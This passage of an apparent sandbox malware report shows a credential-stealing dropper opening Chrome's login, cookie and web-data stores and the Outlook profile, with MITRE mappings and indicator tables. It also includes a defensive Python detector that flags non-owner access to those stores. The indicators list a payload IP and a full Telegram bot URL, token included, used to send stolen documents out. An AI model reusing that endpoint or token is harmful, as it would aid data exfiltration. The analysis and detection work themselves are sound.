                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
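                    The four events above are the direct evidence behind the "Tries to steal Mail credentials" and "Tries to harvest and steal browser information" signatures: RegAsm.exe, a .NET assembly-registration utility that has no legitimate reason to touch either store, opens Chrome's Web Data, Login Data and Cookies databases and the Outlook MAPI profile key (Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, where Outlook keeps account settings and stored mail passwords). The script below is an added example, not part of the Joe Sandbox report: it parses behaviour lines in this report's "Source: <image><action>: <target>" form and flags credential-store access by any process other than the store's owning application, plus the root\SecurityCenter2 AntiVirusProduct query shown just before this section. The sample lines are constructed from this page (with one added benign control line), and the owner mapping (chrome.exe for Chrome databases, outlook.exe for the MAPI profile) is an assumption.

```python
"""
Flag credential-store access by processes that do not own the store, working over
Joe Sandbox-style behaviour lines like the ones in this report.

Added example; not part of the Joe Sandbox report. The sample lines are constructed
from the events shown in this section plus one benign control line, and the
"owner" mapping (which process legitimately opens each store) is an assumption.
"""
import re

# Constructed sample: the four "Stealing of Sensitive Information" events, the
# SecurityCenter2 WMI query from the preceding block, one font query line, and a
# constructed benign line where Chrome opens its own database.
SAMPLE_EVENTS = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation",
    # Constructed benign control (not in the report): the browser opening its own store.
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
]

# The report glues the source image path directly onto the action verb, so the
# parser splits on the first ".exe" that is followed by a known action.
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?\.exe)"
    r"(?P<action>File opened|Key opened|Key value queried|WMI Queries|Queries volume information):\s*"
    r"(?P<target>.+)$"
)

# Credential stores worth alerting on, with the process expected to open them (assumption).
STORES = [
    (re.compile(r"\\Google\\Chrome\\User Data\\.*\\(Login Data|Web Data|Cookies)$", re.I),
     {"chrome.exe"}, "Chrome credential store"),
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I),
     {"outlook.exe"}, "Outlook MAPI profile"),
]


def parse_event(line):
    """Split one behaviour line into process name, full image path, action and target."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    image = m.group("source")
    return {
        "process": image.rsplit("\\", 1)[-1].lower(),
        "image": image,
        "action": m.group("action"),
        "target": m.group("target").strip(),
    }


def find_credential_theft(lines):
    """Return (process, store label, target) for every store opened by a non-owner process."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["action"] not in ("File opened", "Key opened"):
            continue
        for pattern, owners, label in STORES:
            if pattern.search(ev["target"]) and ev["process"] not in owners:
                findings.append((ev["process"], label, ev["target"]))
                break
    return findings


def find_av_discovery(lines):
    """Return processes that enumerated installed AV products via root\\SecurityCenter2."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev and ev["action"] == "WMI Queries" and re.search(
                r"SecurityCenter2.*AntiVirusProduct", ev["target"], re.I):
            hits.append(ev["process"])
    return hits


if __name__ == "__main__":
    for process, label, target in find_credential_theft(SAMPLE_EVENTS):
        print(f"[credential access] {process} opened {label}: {target}")
    for process in find_av_discovery(SAMPLE_EVENTS):
        print(f"[security software discovery] {process} queried SecurityCenter2 AntiVirusProduct")
```

                    Run against the constructed sample, the script reports the four RegAsm.exe store accesses and the AntiVirusProduct enumeration while ignoring the font queries and the chrome.exe control line. The same owner-versus-accessor logic transfers to endpoint telemetry (file-open and registry events keyed on image name); the important design choice is keying on who opens the store, not merely that the store was opened, since the owning application touches it constantly.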
                    MITRE ATT&CK Matrix (one line per tactic column; the number in parentheses is the signature count displayed next to that technique)

                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: Windows Management Instrumentation (1); PowerShell (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
                    Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                    Privilege Escalation: DLL Side-Loading (1); Process Injection (11); Registry Run Keys / Startup Folder (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                    Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (11); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11)
                    Credential Access: OS Credential Dumping (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: File and Directory Discovery (1); System Information Discovery (23); Security Software Discovery (211); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                    Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Command and Control: Web Service (1); Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (4); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 722938
                    Sample: SecuriteInfo.com.Win32.Drop...
                    Startdate: 14/10/2022
                    Architecture: WINDOWS
                    Score: 100

                    • Root node
                      Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; .NET source code contains potential unpacker; 4 other signatures
                      Started: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe (16 7); Fdmru.exe (14 2); Fdmru.exe (2)
                    • SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                      DNS/IP: 41.216.183.235, ports 49699, 49700, 49701, AS40676US, South Africa
                      Dropped: C:\Users\user\AppData\Roaming\...\Fdmru.exe (PE32); C:\Users\user\...\Fdmru.exe:Zone.Identifier (ASCII); SecuriteInfo.com.W...n.785.24355.exe.log (ASCII)
                      Signatures: Encrypted powershell cmdline option found
                      Started: RegAsm.exe (14 14); powershell.exe (16); RegAsm.exe; RegAsm.exe
                    • Fdmru.exe
                      Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    • RegAsm.exe
                      DNS/IP: api.telegram.org, 149.154.167.220, TELEGRAMRU, United Kingdom
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                    • powershell.exe
                      Started: conhost.exe

                    Source | Detection | Scanner | Label | Link
                    SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | 22% | Virustotal | | Browse
                    SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe | 22% | Virustotal | | Browse

                    Source | Detection | Scanner | Label | Link | Download
                    16.0.RegAsm.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1235897 | | Download File
                    18.3.Fdmru.exe.764bf14.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2 | | Download File

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
                    http://www.tiro.com | 0% | URL Reputation | safe |
                    http://www.tiro.com | 0% | URL Reputation | safe |
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe |
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe |
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe |
                    http://www.typography.netD | 0% | URL Reputation | safe |
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
                    http://fontfabrik.com | 0% | URL Reputation | safe |
                    http://fontfabrik.com | 0% | URL Reputation | safe |
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe |
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
                    http://www.sakkal.com | 0% | URL Reputation | safe |
                    http://www.sakkal.com | 0% | URL Reputation | safe |
                    http://james.newtonking.com/projects/json | 0% | URL Reputation | safe |
                    http://www.carterandcone.coml | 0% | URL Reputation | safe |
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
                    http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
                    http://41.216.183.235/Fppsmppzh.png | 0% | Avira URL Cloud | safe |
                    https://api.telegram.org48k | 0% | Avira URL Cloud | safe |
                    http://41.216.183.235/Fppsmppzh.png | 0% | Virustotal | | Browse
                    https://vectorstealer.com | 0% | Virustotal | | Browse
                    https://vectorstealer.com | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.telegram.org | 149.154.167.220 | true | false | | high

                    Name | Malicious | Antivirus Detection | Reputation
                    http://41.216.183.235/Fppsmppzh.png | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                    https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://duckduckgo.com/chrome_newtab | RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    http://www.fontbureau.com/designersG | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/ac/?q= | tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    http://www.fontbureau.com/designers/? | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.founder.com.cn/cn/bThe | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
                    https://api.telegram.org | RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.fontbureau.com/designers? | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://search.yahoo.com?fr=crmas_sfpf | RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    http://www.tiro.com | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
                    https://www.newtonsoft.com/json | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.fontbureau.com/designers | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.goodfont.co.kr | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
                    http://www.sajatypeworks.com | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.typography.netD | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.founder.com.cn/cn/cThe | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://api.telegram.org48k | RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://www.galapagosdesign.com/staff/dennis.htm | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://fontfabrik.com | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
                    http://www.galapagosdesign.com/DPlease | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.fonts.com | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.sandoll.co.kr | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.urwpp.deDPlease | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.zhongyicts.com.cn | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://vectorstealer.com | RegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.503779743.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.sakkal.com | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
                    https://github.com/JamesNK/Newtonsoft.Json | RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.apache.org/licenses/LICENSE-2.0 | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.fontbureau.com | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentH | RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentP | RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.dr | false | | high
